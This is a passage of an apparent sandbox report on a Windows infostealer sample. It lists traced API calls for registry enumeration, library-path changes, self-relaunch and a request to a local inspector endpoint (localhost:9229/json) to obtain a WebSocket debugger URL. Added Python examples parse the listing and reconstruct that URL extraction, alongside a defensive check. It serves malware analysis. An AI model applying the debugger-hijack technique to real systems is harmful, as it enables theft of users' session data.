                              • Instruction Fuzzy Hash: 5DE13570E11219EFDF10DFA8C884ADEBBB5FF48300F1044A9E509A7241EB74AE85CB91
                              APIs
                              • memset.MSVCRT ref: 005ADAC1
                              • memset.MSVCRT ref: 005ADAD3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005ADAFB
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ADB2E
                              • lstrcat.KERNEL32(?,00000000), ref: 005ADB3C
                              • lstrcat.KERNEL32(?,0160E838), ref: 005ADB56
                              • lstrcat.KERNEL32(?,?), ref: 005ADB6A
                              • lstrcat.KERNEL32(?,0160DB88), ref: 005ADB7E
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ADBAE
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005ADBB5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005ADC1E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: 0df1534a33faef961832263e4bb917a82d8ea0ae259181603fd7d0121c73aae0
                              • Instruction ID: c7149e00dfe390885184deb9ff17b44e6e3e17d0f28692faafda2f2e43766c88
                              • Opcode Fuzzy Hash: 0df1534a33faef961832263e4bb917a82d8ea0ae259181603fd7d0121c73aae0
                              • Instruction Fuzzy Hash: F6B1837191025AAFDF10EFA4CC999EE7BB5FF88300F144969E506A7250EA349E45CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059B420
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B46E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B499
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059B4A1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B4C9
                              • lstrlen.KERNEL32(005C5218), ref: 0059B540
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B564
                              • lstrcat.KERNEL32(00000000,005C5218), ref: 0059B570
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B599
                              • lstrlen.KERNEL32(00000000), ref: 0059B61D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B647
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059B64F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B677
                              • lstrlen.KERNEL32(005C509C), ref: 0059B6EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B712
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 0059B71E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B74E
                              • lstrlen.KERNEL32(?), ref: 0059B857
                              • lstrlen.KERNEL32(?), ref: 0059B866
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B88E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: bba4f3f209f5a503d7b5e2d6e0f8e0c897c86fca653498e537cf1347b18c8d58
                              • Instruction ID: 2f822183820848c7dcd9f9f2faf20d4d31791d70df8f0c864d5b6b30db9c742c
                              • Opcode Fuzzy Hash: bba4f3f209f5a503d7b5e2d6e0f8e0c897c86fca653498e537cf1347b18c8d58
                              • Instruction Fuzzy Hash: 0A024F30A012069FEF24DF65EA89A6EBFB5FF84704F19816DE4099B261D735DC42CB80
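Added example (not part of the Joe Sandbox report or of the sample): a small Python parser for the API listing format used throughout this section, so the bullet lines can be turned into records and queried instead of read by eye. The input below is constructed by copying lines from the listing by hand; the record and function names are mine, and the samDesired table is the winreg.h values (KEY_READ = 0x20019, KEY_WRITE = 0x20006, KEY_ALL_ACCESS = 0xF003F).

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: lines copied by hand from the listing above. The plugin's format is
# "• API.MODULE(args), ref: ADDR", sometimes without an argument list, sometimes prefixed with
# "Part of subcall function ADDR:" when the call sits in a callee folded into the record.
SAMPLE_LISTING = """
  • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
• RegOpenKeyExA.ADVAPI32(?,0160BC88,00000000,00020019,?), ref: 005B375D
• RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005B3797
• wsprintfA.USER32 ref: 005B37C2
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 005B37E0
• RegCloseKey.ADVAPI32(?), ref: 005B37EE
• RegQueryValueExA.ADVAPI32(?,0160E610,00000000,000F003F,?,?), ref: 005B3841
• lstrlen.KERNEL32(?), ref: 005B3856
  • Part of subcall function 005989B0: std::_Xinvalid_argument.LIBCPMT ref: 005989C6
"""

LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]{8}):\s*)?  # optional sub-call prefix
        (?P<api>[A-Za-z_][\w:]*)\.(?P<module>[A-Za-z0-9_]+)            # lstrcpy.KERNEL32, std::_X...LIBCPMT
        (?:\((?P<args>[^)]*)\))?                                       # argument list is optional
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # address of the folded-in callee, when the line carries that prefix


def parse_listing(text: str) -> List[ApiCall]:
    """Turn the plugin's API bullet lines into records; raises on a non-empty line it cannot read."""
    calls = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LINE_RE.match(raw)
        if m is None:
            raise ValueError(f"unrecognised API line: {raw!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(
            api=m["api"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def api_histogram(calls: List[ApiCall]) -> Counter:
    """Counts per API name, i.e. the information the report's "API ID" line condenses."""
    return Counter(c.api for c in calls)


KEY_SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}  # winreg.h


def sam_name(hex_arg: str) -> str:
    """Decode a samDesired value to its SDK name; non-numeric placeholders such as '?' pass through."""
    try:
        v = int(hex_arg, 16)
    except ValueError:
        return hex_arg
    return KEY_SAM.get(v, f"0x{v:X}")


def registry_opens(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """(call site, access rights) for every RegOpenKeyExA; samDesired is its fourth argument."""
    return [(c.ref, sam_name(c.args[3])) for c in calls
            if c.api == "RegOpenKeyExA" and len(c.args) >= 4]


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    print(api_histogram(parsed).most_common(3))
    print([(f"{ref:08X}", sam) for ref, sam in registry_opens(parsed)])
```

Run over a whole report the histogram gives a quick per-function capability sketch (registry walk, string building, WinINet), and decoding constants such as 0x20019 to KEY_READ tells you the enumeration above is read-only.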
                              APIs
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • RegOpenKeyExA.ADVAPI32(?,0160BC88,00000000,00020019,?), ref: 005B375D
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005B3797
                              • wsprintfA.USER32 ref: 005B37C2
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 005B37E0
                              • RegCloseKey.ADVAPI32(?), ref: 005B37EE
                              • RegCloseKey.ADVAPI32(?), ref: 005B37F8
                              • RegQueryValueExA.ADVAPI32(?,0160E610,00000000,000F003F,?,?), ref: 005B3841
                              • lstrlen.KERNEL32(?), ref: 005B3856
                              • RegQueryValueExA.ADVAPI32(?,0160E4C0,00000000,000F003F,?,00000400), ref: 005B38C7
                              • RegCloseKey.ADVAPI32(?), ref: 005B3912
                              • RegCloseKey.ADVAPI32(?), ref: 005B3929
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: 35206cb1dc59736a7603f310e7b7271b7a56675fe5bf84b00c40f07e6270d48e
                              • Instruction ID: 310efeaa5d1bd2841092499f3e09f7d6c2f4a8ec26e6bef6f98ec01e522d37d4
                              • Opcode Fuzzy Hash: 35206cb1dc59736a7603f310e7b7271b7a56675fe5bf84b00c40f07e6270d48e
                              • Instruction Fuzzy Hash: DB915F729002099FCB14DF94CC85DEEBBB9FB88310F1585ADE609B7251DB35AE46CB90
                              APIs
                              • InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 0059910F
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0059912C
                              • InternetCloseHandle.WININET(00000000), ref: 00599139
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00599196
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 005991C7
                              • InternetCloseHandle.WININET(00000000), ref: 005991D2
                              • InternetCloseHandle.WININET(00000000), ref: 005991D9
                              • strlen.MSVCRT ref: 005991EA
                              • strlen.MSVCRT ref: 0059921D
                              • strlen.MSVCRT ref: 0059925E
                              • strlen.MSVCRT ref: 0059927C
                                • Part of subcall function 005989B0: std::_Xinvalid_argument.LIBCPMT ref: 005989C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: 78ef65e2dd9711645ffd52ecb9702a4a0ba0c7792c0edc418e345522f359aa97
                              • Instruction ID: e603e437a8871277a1a23215c1484293b61a0d22facb17278d7aa1d4efe7caa6
                              • Opcode Fuzzy Hash: 78ef65e2dd9711645ffd52ecb9702a4a0ba0c7792c0edc418e345522f359aa97
                              • Instruction Fuzzy Hash: 8551A471600209ABDB10DBE8DC49FEEBBF9BB84710F14416DF504A3290EBB4AA45D765
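Added example (not part of the Joe Sandbox report or of the sample): a Python reconstruction of the parsing step the record above implies. The function opens http://localhost:9229/json, which is the DevTools-protocol target list (9229 is the default port of Node.js's --inspect; 9222 is the value Chromium's documentation uses for --remote-debugging-port), and its only other strings are "webSocketDebuggerUrl": and "ws://, consistent with scanning that response for the WebSocket debugger URL rather than parsing JSON. The response body below is constructed, since the report does not show what the sample received, and the function names are mine; the scanning variant mirrors the string-search style, the JSON variant is what a robust tool would do, and the last helper is a defender-side check for a loopback inspector URL.

```python
import json
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed stand-in for a DevTools-protocol /json response; the report shows only the URL
# and the two marker strings, not the data the sample obtained.
SAMPLE_RESPONSE = b"""[ {
  "description": "node.js instance",
  "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?ws=localhost:9229/0a1b2c3d",
  "id": "0a1b2c3d",
  "title": "app.js",
  "type": "node",
  "url": "file:///C:/app/app.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/0a1b2c3d"
} ]"""

KEY_MARKER = b'"webSocketDebuggerUrl":'   # string present in the record above
URL_MARKER = b'"ws://'                    # string present in the record above


def extract_debugger_url_by_scan(body: bytes) -> Optional[str]:
    """Byte scanning in the style the record's strings suggest: find the key, then the quoted
    ws:// literal after it, then the closing quote. Returns None if any marker is missing."""
    k = body.find(KEY_MARKER)
    if k < 0:
        return None
    start = body.find(URL_MARKER, k + len(KEY_MARKER))
    if start < 0:
        return None
    start += 1                      # skip the opening quote
    end = body.find(b'"', start)
    if end < 0:
        return None
    return body[start:end].decode("ascii", errors="replace")


def extract_debugger_urls(body: bytes) -> List[str]:
    """The same data via a real JSON parser: handles several targets, reordered keys and escaping,
    all of which the byte scanner silently gets wrong."""
    try:
        targets = json.loads(body)
    except ValueError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict) and isinstance(t.get("webSocketDebuggerUrl"), str)]


def is_loopback_inspector(url: str, ports=(9229, 9222)) -> bool:
    """True when a ws:// URL points at an inspector port on the local host. Useful when auditing
    which of your own processes expose a debugger that a stealer could attach to."""
    p = urlsplit(url)
    return (p.scheme == "ws"
            and p.hostname in ("localhost", "127.0.0.1", "::1")
            and p.port in ports)


if __name__ == "__main__":
    print(extract_debugger_url_by_scan(SAMPLE_RESPONSE))
    print(extract_debugger_urls(SAMPLE_RESPONSE))
```

The practical takeaway for defenders is the inverse of the sample's logic: a process that leaves an inspector listening on loopback hands its session to any local code that can issue the GET above, so audit for listeners on 9229/9222 and start Node and Electron applications without --inspect in production.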
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 005B1681
                              • lstrcpy.KERNEL32(00000000,015FBF48), ref: 005B16AC
                              • lstrlen.KERNEL32(?,?,?,?), ref: 005B16B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B16D6
                              • lstrcat.KERNEL32(00000000,?), ref: 005B16E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B170A
                              • lstrlen.KERNEL32(0160ABD8,?,?,?), ref: 005B171F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B1742
                              • lstrcat.KERNEL32(00000000,0160ABD8), ref: 005B174A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1772
                              • ShellExecuteEx.SHELL32(?), ref: 005B17AD
                              • ExitProcess.KERNEL32 ref: 005B17E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: 12e511a3f134a07541bea782703703d7aed2ce4794e1017ada410d4df407bb43
                              • Instruction ID: c1df99a3eb93f6b313101ff964c1ef92b3ff51a6d2e24d19d22651f3b4a5b190
                              • Opcode Fuzzy Hash: 12e511a3f134a07541bea782703703d7aed2ce4794e1017ada410d4df407bb43
                              • Instruction Fuzzy Hash: B2517071A0161AABDB51DFA4CD98ADEBFF9FF84300F548129E505E3251DF34AE018B98
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF134
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF162
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005AF176
                              • lstrlen.KERNEL32(00000000), ref: 005AF185
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 005AF1A3
                              • StrStrA.SHLWAPI(00000000,?), ref: 005AF1D1
                              • lstrlen.KERNEL32(?), ref: 005AF1E4
                              • lstrlen.KERNEL32(00000000), ref: 005AF202
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 005AF24F
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 005AF28F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: 4608ae49a77622073e71aa6e2cb99dd7ce4dab48a50318c6bade6109fa8a5e0e
                              • Instruction ID: 19e415be6007240ebca1b405dac93d9d7bedb944f3ce7aee49bc4a78b47d4063
                              • Opcode Fuzzy Hash: 4608ae49a77622073e71aa6e2cb99dd7ce4dab48a50318c6bade6109fa8a5e0e
                              • Instruction Fuzzy Hash: 4B517E39911206AFCB21AFB8CC4EBAE7FA5FF86704F054568E945DB211DB34EC428791
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(01609578,007C9BD8,0000FFFF), ref: 0059A086
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059A0B3
                              • lstrlen.KERNEL32(007C9BD8), ref: 0059A0C0
                              • lstrcpy.KERNEL32(00000000,007C9BD8), ref: 0059A0EA
                              • lstrlen.KERNEL32(005C5214), ref: 0059A0F5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059A112
                              • lstrcat.KERNEL32(00000000,005C5214), ref: 0059A11E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059A144
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059A14F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059A174
                              • SetEnvironmentVariableA.KERNEL32(01609578,00000000), ref: 0059A18F
                              • LoadLibraryA.KERNEL32(0160DE20), ref: 0059A1A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: a422f07cbd64e50b75fe3e76c04a54f23d741415d189e8299c86891a88166b6d
                              • Instruction ID: b654f728b5b2edd814194c988a15b5deae026b8de6e1842ccebfd819264b5168
                              • Opcode Fuzzy Hash: a422f07cbd64e50b75fe3e76c04a54f23d741415d189e8299c86891a88166b6d
                              • Instruction Fuzzy Hash: F091BE70600A019FDF609FA8DC88E663FA5FB84704F45852DE9058B261EF79DD81CBE2
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AC9A2
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AC9D1
                              • lstrlen.KERNEL32(00000000), ref: 005AC9FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ACA32
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005ACA43
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
